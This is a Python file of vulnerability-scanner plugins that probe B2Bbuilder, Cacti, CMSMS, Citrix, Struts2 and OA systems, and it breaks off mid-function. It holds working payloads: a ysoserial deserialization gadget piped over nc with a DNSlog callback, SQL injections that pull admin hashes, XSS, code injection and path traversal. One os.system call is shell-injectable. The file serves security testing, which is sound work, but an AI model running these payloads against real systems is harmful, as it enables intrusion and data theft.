def medusa(Url,RandomAgent,UnixTimestamp):
    """Out-of-band probe: launch a ysoserial payload through a shell pipeline and poll a DNSlog sink.

    Url is split into scheme/host/port and the scheme's default port is filled in. A DNSlog hit is
    recorded via VulnerabilityDetails and WriteFile; any exception is written to the error log.
    RandomAgent is accepted for signature parity with the other plugins but is not used here.
    Dnslog, Ysoserial, UrlProcessing, VulnerabilityInfo and ClassCongregation come from the plugin's module scope.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        dns=Dnslog()
        # NOTE(review): `url` and `port` derive from the caller-supplied Url and are interpolated unquoted
        # into a command string executed by os.system; a crafted target string can therefore inject extra
        # shell commands into the scanner's own process. subprocess with an argument list (shell=False)
        # would avoid that. os.system also only returns an exit status, so a failed invocation is not
        # caught by the except below.
        os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(Ysoserial().result(),dns.dns_host(),url, port))
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(url,scheme + "://" + url +":"+ str(port))
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url, RandomAgent, UnixTimestamp):
    """GET /5clib/property.action and treat two configuration-path markers in a 200 body as a positive.

    The positive is written via VulnerabilityDetails and WriteFile; exceptions go to Outlier and the
    error log. TLS verification is disabled for the request (verify=False).
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/5clib/property.action"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # Both markers must be present; either alone is not counted.
        if code == 200 and con.find('DEFAULT_PDF_LIB_PATH') != -1 and con.find( 'DEFAULT_SQL_BACKUP_PATH') != -1:
            Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception as e:
        # Report the exception through the shared handler, then log it under the plugin's group name.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 Medusa = [ B2BbuilderBackgroundCommandExecutionVulnerability.medusa( Url, RandomAgent, ProxyIp), B2BbuilderContainsVulnerabilitiesLocally.medusa( Url, RandomAgent, ProxyIp), B2BbuilderHeadSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability2.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability3.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability4.medusa(Url, RandomAgent, ProxyIp), ] try: for i in tqdm(Medusa, ascii=True, desc="B2Bbuilder plugin progress"): WriteFile.Write(str(i)) except: pass
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = url + payload resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, ProxyIp):
    """POST the module-level post_data to the module-level payload path and look for passwd-style markers.

    `payload` and `post_data` are defined in the plugin module, outside this function. ProxyIp is
    accepted but not applied to the request. The raw response body (resp.content) is scanned; a
    positive is rated High and written via WriteFile. Any exception is logged under the plugin name.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            "Referer": payload_url,
            "Cookie": "JSESSIONID=abcT_7z-8zGPy7QoU_n1w; testBanCookie=test",
            "Content-Type": "application/x-www-form-urlencoded",
            'User-Agent': RandomAgent,
        }
        resp = requests.post(payload_url, data=post_data, headers=headers, timeout=10, verify=False)
        con = resp.content  # raw body, not the decoded text used by most sibling plugins
        code = resp.status_code
        if code == 200 and (con.lower().find('system:') != -1 or con.lower().find('root:') != -1):
            Medusa = "{} 存在泛微OA远程代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format( url, payload_url, post_data)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except:
        # Bare except: every failure, including KeyboardInterrupt, ends up in the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def BoomDB(Url, SqlUser, SqlPasswrod, InputFileName):
    """Dispatch the database credential check to BlastingDB for one target or for every line of a file.

    Nothing happens unless at least one of SqlUser / SqlPasswrod is given. In batch mode each line of
    InputFileName is passed as-is, including its trailing newline — presumably BlastingDB.BoomDB
    tolerates that; confirm against its implementation. The final `else: pass` is unreachable because
    the `if`/`elif` already cover both None and not-None.
    """
    if SqlUser != None or SqlPasswrod != None:
        BlastingDB = ClassCongregation.BlastingDB( SqlUser, SqlPasswrod) # enable the database check as soon as either the user or the password input is present
        if InputFileName == None: # single target: use the URL directly
            BlastingDB.BoomDB(Url)
        elif InputFileName != None: # batch mode: loop over the targets in the file
            with open(InputFileName, encoding='utf-8') as f:
                for UrlLine in f:
                    Urls = UrlLine
                    BlastingDB.BoomDB(Urls)
        else:
            pass
def medusa(Url, RandomAgent, UnixTimestamp):
    """Header-based SQL injection probe against /index.php via X-Forwarded-For.

    The response is a positive only if status is 200 and the fixed marker hash appears in the body
    (presumably the md5 value the injected expression produces — confirm). The hit is written via
    VulnerabilityDetails and WriteFile; exceptions go to the error log under the plugin name.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/index.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """CRLF-injection probe: GET the module-level Payload path and look for 'bin' and 'root' in the body.

    `Payload` is defined in the plugin module. proxies is normalised through ClassCongregation.Proxies.
    NOTE(review): Headers is mutated in place (Host, Accept, Connection), so the caller's dict — and any
    other plugin sharing it — sees the changes. The 'bin'/'root' indicators are very loose and will
    match ordinary pages containing those words. TLS verification is left at the requests default here.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)
    Headers['Host'] = host
    Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    Headers['Connection'] = 'close'
    try:
        resp = requests.get(PayloadUrl, headers=Headers, proxies=proxies, timeout=5)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower().find('bin') != -1 and con.lower().find( 'root') != -1:
            Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception as e:
        # Report the exception through the shared handler, then log it with the plugin name and target.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log writer
def medusa(Url,RandomAgent,ProxyIp):
    """POST the module-level post_data to each path in the module-level `payloads` and stop at the first hit.

    `payloads` and `post_data` live in the plugin module. A hit requires both monitor-page markers in
    the body; it is rated High and returned as str(_t.info). Without a hit the function returns None.
    NOTE(review): `global resp`/`global resp2` make the last response module-global state that persists
    across calls; resp2 is never assigned here. ProxyIp is only applied to the "http" scheme.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    global resp
    global resp2
    try:
        for payload in payloads:
            payload_url = scheme+"://"+url+ ':' + str(port)+payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            if ProxyIp!=None:
                proxies = {
                    # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp==None:
                resp = requests.post(payload_url, data=post_data,headers=headers, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if con.lower().find('a8 management monitor')!=-1 and con.lower().find('connections stack trace')!=-1:
                Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                return (str(_t.info))
    except:
        # Bare except: any failure in any iteration aborts the whole loop and is logged.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, ProxyIp):
    """GET the module_translations.php path and treat a phpinfo-style page ('PHP Version' + 'system') as a positive.

    ProxyIp is accepted but not applied to the request. A hit is rated High and written via WriteFile;
    exceptions are logged under the plugin name.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = '/admin/module_translations.php?mod=;phpinfo()'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("PHP Version") != -1 and con.find( "system") != -1:
            Medusa = "{}存在B2Bbuilder后台命令执行漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """GET `turl + payload` for every prefix in the module-level `urls`, one try/except per iteration.

    `urls` and `payload` are defined in the plugin module. A body containing the netstat-style marker is
    recorded through WriteFile and VulnerabilityDetails (which receives kwargs). An exception in one
    iteration is logged and the loop continues with the next prefix.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    for turl in urls:
        try:
            payload_url = scheme + "://" + url + ':' + str( port) + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            # status code is read but not part of the decision here
            if con.lower().find('active internet connections') != -1:
                Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
                ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
        except Exception as e:
            # Report the exception through the shared handler, then log it with the plugin name and target.
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) # call the log writer
def medusa(Url, RandomAgent, ProxyIp):
    """POST a serialized selected_items value to /cdef.php and look for the fixed marker hash in the body.

    Uses ClassCongregation.UrlProcessing().result rather than the bare UrlProcessing helper used by
    sibling plugins. ProxyIp is accepted but not applied. The status code is read but not checked.
    A hit is rated High and written via WriteFile; exceptions are logged under the plugin name.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/cdef.php?action=actions"
        # Three adjacent literals are concatenated by the parser into one string.
        data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 "
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url, RandomAgent, UnixTimestamp):
    """CRLF-injection probe: GET the module-level Payload path and look for 'bin' and 'root' in a 200 body.

    `Payload` is defined in the plugin module. The 'bin'/'root' indicators are loose and will match
    ordinary pages containing those words. TLS verification is left at the requests default here.
    A hit is written via VulnerabilityDetails and WriteFile; any failure is logged under the plugin name.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }
    try:
        s = requests.session()
        resp = s.get(PayloadUrl, headers=headers, timeout=5)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower().find('bin') != -1 and con.lower().find( 'root') != -1:
            Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except:
        # Bare except: every failure, including KeyboardInterrupt, ends up in the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, UnixTimestamp):
    """Two probes: one GET per prefix in the module-level `urls`, then a single GET of /include/get_user.aspx.

    `urls` and `payload` are defined in the plugin module. The first probe requires status 500 plus the
    'gqxmicrosoft' marker and — unlike the second — builds its URL without the explicit port. The
    second probe only checks for 'button_normal'. Each probe logs its own exceptions.
    NOTE(review): indentation was reconstructed from a collapsed source; the second try block is placed
    after the loop because it does not use `turl` — confirm against the original file.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    for turl in urls:
        try:
            payload_url = scheme + "://" + url + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 500 and con.lower().find('gqxmicrosoft') != -1:
                Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url)
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
        except:
            # Bare except: log and move on to the next prefix.
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
    try:
        payload_url = scheme + "://" + url + ':' + str( port) + "/include/get_user.aspx"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
        con = resp.text
        # No status-code check for this probe; the marker alone decides.
        if con.lower().find('button_normal') != -1:
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
    except:
        # Bare except: every failure, including KeyboardInterrupt, ends up in the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, UnixTimestamp):
    """Reflected-XSS probe for the CMSMS install page using a fixed marker string.

    The static marker 'cscan-hyhmnn' is embedded in the POST body and the response is a positive if
    status is 200 and the marker is echoed back. Uses ClassCongregation.UrlProcessing().result.
    A hit is written via VulnerabilityDetails and WriteFile; exceptions are logged under the plugin name.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit'''
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cscan-hyhmnn') != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url, RandomAgent, ProxyIp=None):
    """Path-traversal probe: GET two /vpn/../vpns/ paths and look for 'encrypt password' in a 200 body.

    ProxyIp is accepted but not applied to the requests. Both paths are tried inside one try block, so an
    exception on the first aborts the second. A hit is rated High and written via WriteFile.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"]
        for payload in payloads:
            payload_url = scheme + '://' + url + ':' + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.find("encrypt password") != -1:
                Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format( url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url,RandomAgent,ProxyIp):
    """POST the module-level `payload` to /user.action and look for id-style output ('uid', 'gid', 'groups').

    `payload` is defined in the plugin module. ProxyIp is accepted but not applied. A hit is rated High
    and written via WriteFile; any failure is logged under the plugin name.
    NOTE(review): 'Content-Length' is hard-coded to '571' while requests normally derives it from the
    body; confirm the value matches len(payload) or drop the header.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    payload_url = scheme+"://"+url+':'+str(port)+'/user.action'
    host=url+':'+str(port)
    headers = {
        'Host':host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '571',
        'DNT': '1',
        'Referer':payload_url,
        'Upgrade-Insecure-Requests': '1'
    }
    try:
        s = requests.session()
        resp = s.post(payload_url, data=payload,headers=headers, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1:
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file; url is the target file name, Medusa the result
    except:
        # Bare except: every failure, including KeyboardInterrupt, ends up in the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, ProxyIp):
    """GET every path in the module-level `payloads` and collect the ones whose body contains the fixed marker hash.

    `payloads` is defined in the plugin module. Hits are rated High, appended to Medusas and returned
    together as VulnerabilityInfo(Medusas).info; with no hits the same structure is returned empty.
    NOTE(review): `global resp`/`global resp2` make the last response module-global state; resp2 is
    never assigned here. ProxyIp is only applied to the "http" scheme. The URL is built without the
    explicit port, unlike most sibling plugins.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    global resp
    global resp2
    Medusas = []
    try:
        for payload in payloads:
            payload_url = scheme + "://" + url + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            if ProxyIp != None:
                proxies = {
                    # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp == None:
                resp = requests.get(payload_url, headers=headers, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            # status code is read but not part of the decision
            if con.lower().find('81dc9bdb52d04dc20036dbd8313ed055') != -1:
                Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url)
                Medusas.append(str(Medusa))
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
